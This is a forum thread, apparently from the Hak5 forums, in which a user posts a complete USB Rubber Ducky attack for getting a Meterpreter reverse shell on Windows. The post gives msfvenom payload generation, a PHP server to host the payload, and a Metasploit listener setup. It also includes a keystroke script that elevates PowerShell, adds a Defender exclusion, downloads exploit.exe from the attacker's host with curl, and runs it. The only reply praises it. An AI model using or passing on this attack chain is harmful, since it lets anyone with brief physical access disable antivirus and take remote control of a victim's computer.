Jump to content
Sign in to follow this  
Phosgene

Getting a Reverse Shell in 1 second

Recommended Posts

So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds 

NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip)

ports that need to be port forwarded 8888 & 8080

Heres the setup proc: (I use parrot sec os)

Create the payload

cd ~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe

Start the PHP server

sudo php -S 0.0.0.0:8080 -t ~

Start your listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST <your public ip>
set LPORT 8888
set ExitOnSession false
exploit -j -z

Heres The Ducky Script

DELAY 350 
GUI r 
DELAY 100
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 150
ALT y
STRING powershell Add-MpPreference -ExclusionPath "C:\users"
ENTER
DELAY 100
STRING curl -o "C:\users\exploit.exe" "http://< your public ip>:8080/exploit.exe"
ENTER
DELAY 100
STRING start C:\users\exploit.exe 
ENTER
DELAY 100
STRING exit
ENTER

and done!

Share this post


Link to post
Share on other sites

That's rather neat.

Please post it where it should go though.

https://forums.hak5.org/forum/56-usb-rubber-ducky/

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...